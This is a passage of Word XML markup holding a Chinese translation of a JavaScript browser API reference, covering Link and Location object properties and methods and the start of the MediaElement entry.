    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string pathname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>path</w:t>
      </w:r>
      <w:r>
        <w:t>部分，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>/catalog/search.html"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>的端口部分，例如</w:t>
      </w:r>
      <w:r>
        <w:t>“1234”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>的协议部分，包括尾部的冒号，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"http:"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly DOMTokenList relList</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>classList</w:t>
      </w:r>
      <w:r>
        <w:t>属性，这个属性让从＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML rel</w:t>
      </w:r>
      <w:r>
        <w:t>属性中查询、设置以及删除操作更容易。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>的查询部分，包括开头的问号，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"?q=JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>m=10"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly CSSStyleSheet sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>适用于引用样式表的＜</w:t>
      </w:r>
      <w:r>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，这个属性表示已连接的样式表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>＞或＜</w:t>
      </w:r>
      <w:r>
        <w:t>area</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素的纯文本内容。等同于</w:t>
      </w:r>
      <w:r>
        <w:t>Node.textContent</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string title</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素都支持</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>属性，一般它用于指定该元素的工具提示信息文本。如果在</w:t>
      </w:r>
      <w:r>
        <w:t>rel</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"alternate stylesheet"</w:t>
      </w:r>
      <w:r>
        <w:t>的＜</w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ink</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素上设置这个属性，将为它提供一个名字，用户将可以通过这个名字启用或禁用该样式表，如果浏览器支持替换样式</w:t>
      </w:r>
      <w:r>
        <w:t>表的话，指定的</w:t>
      </w:r>
      <w:r>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:t>还可能以某种形式出现在浏览器的用户界面上。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="848" w:name="Location"/>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:bookmarkEnd w:id="848"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>代表并控制浏览器的地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>location</w:t>
      </w:r>
      <w:r>
        <w:t>属性指代一个</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这个对象代表当前文档的页面地址（即</w:t>
      </w:r>
      <w:r>
        <w:t>"location"</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性包含该文档的完整</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的其他属性各自描述了这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分。这些属性很像</w:t>
      </w:r>
      <w:r>
        <w:t>Link</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>属性。当</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象用做字符串时，将返回</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。这意味着可以在使用</w:t>
      </w:r>
      <w:r>
        <w:t>location.href</w:t>
      </w:r>
      <w:r>
        <w:t>表达式的地方使用</w:t>
      </w:r>
      <w:r>
        <w:t>lo</w:t>
      </w:r>
      <w:r>
        <w:t>cation</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>除了代表当前浏览器地址，</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象也控制这个地址。如果把一个包含</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象或它的</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性，</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器将加载并显示这个</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以通过设置其他</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>属性改变当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分的方式，让浏览器加载一个新的文档。例如，如果设置</w:t>
      </w:r>
      <w:r>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:t>属性，浏览器将以一个追加的新查询字符串重新加载当前</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。如果设置</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性，浏览器不会加载新的文档，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>但它会创建一个新的历史记录。并且，如果该</w:t>
      </w:r>
      <w:r>
        <w:t>hash</w:t>
      </w:r>
      <w:r>
        <w:t>属性标识文档中的一个元素，则浏览器将滚动文档，以便让该</w:t>
      </w:r>
      <w:r>
        <w:t>元素可见。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性指代当前文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的多个部分。在下面描述的属性中，给出的例子都是这个（虚构的）</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.oreilly.com:1234/catalog/search.html?q=JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>m=10#results</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string hash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的锚部分，包括开头的哈希（</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>）符号，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"#results"</w:t>
      </w:r>
      <w:r>
        <w:t>。文档</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的这个部分指定文档中某个锚的名字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的主机名和端口部分，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"http://www.oreilly.com:1234"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的主机名部分，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"http://www.oreilly.com"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string href</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>文档的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的完整文本，不同于其他只指定</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的一部分的</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>属性。将这个属性设置为一个新的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>将导致浏览器读取并显示新</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。把一个值直接赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象将设置这个属性，把一个</w:t>
      </w:r>
      <w:r>
        <w:t>Location</w:t>
      </w:r>
      <w:r>
        <w:t>对象用做一个字符串将使用这个属性的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string pathna</w:t>
      </w:r>
      <w:r>
        <w:t>me</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的路径名部分，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"/catalog/search.html"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的端口部分，例如</w:t>
      </w:r>
      <w:r>
        <w:t>“1234”</w:t>
      </w:r>
      <w:r>
        <w:t>。注意这个属性是一个字符串，而不是一个数字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的协议部分，包括尾部的冒号，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"http:"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>的查询部分，包括开头的问号，例如</w:t>
      </w:r>
      <w:r>
        <w:t>"?q=JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>＆</w:t>
      </w:r>
      <w:r>
        <w:t>m=10"</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void assign(string url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>加载并显示指定</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>的内容，等同于</w:t>
      </w:r>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置为</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r>
        <w:t>reload()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>重新加载当前显示的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void replace(string url)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>加载并显示指定</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:t>的内容，在浏览器的历史记录中替换掉当前文档，这样浏览器的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>后退</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>按钮将把浏览器带到前一个显示的文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="849" w:name="MediaElement"/>
      <w:r>
        <w:t>MediaElement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="849"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>媒体播放元素</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MediaElement</w:t>
      </w:r>
      <w:r>
        <w:t>是＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素共同的超类。这两个元素定义的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>几乎一模一样，这些相同的</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>在这儿有描述，不过，音频和视频相关的细节请参见</w:t>
      </w:r>
      <w:r>
        <w:t>Audio</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>Video</w:t>
      </w:r>
      <w:r>
        <w:t>。关于这些媒体元素的介绍请参见</w:t>
      </w:r>
      <w:r>
        <w:t>21.2</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>常量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>NETWORK</w:t>
      </w:r>
      <w:r>
        <w:t>常量是</w:t>
      </w:r>
      <w:r>
        <w:t>networkState</w:t>
      </w:r>
      <w:r>
        <w:t>可能的值，</w:t>
      </w:r>
      <w:r>
        <w:t>HAVE</w:t>
      </w:r>
      <w:r>
        <w:t>常量是</w:t>
      </w:r>
      <w:r>
        <w:t>readyState</w:t>
      </w:r>
      <w:r>
        <w:t>属性可能的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NETWORK_EMPTY=0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素还没有开始使用网络。在</w:t>
      </w:r>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:r>
        <w:t>属性设置之前可能处于这个状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NETWORK_IDLE=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素现在不在从网络加载数据。它可能已经加载完全部资源了，或者它可能已经缓存了它现在需要的数据，也或者可能是它的</w:t>
      </w:r>
      <w:r>
        <w:t>preload</w:t>
      </w:r>
      <w:r>
        <w:t>设置为</w:t>
      </w:r>
      <w:r>
        <w:t>"none"</w:t>
      </w:r>
      <w:r>
        <w:t>，并且还没有要求加载或播放媒体。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned shor</w:t>
      </w:r>
      <w:r>
        <w:t>t NETWORK_LOADING=2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前元素当前正在使用网络加载媒体数据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>unsigned short NETWORK_NO_SOURCE=3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
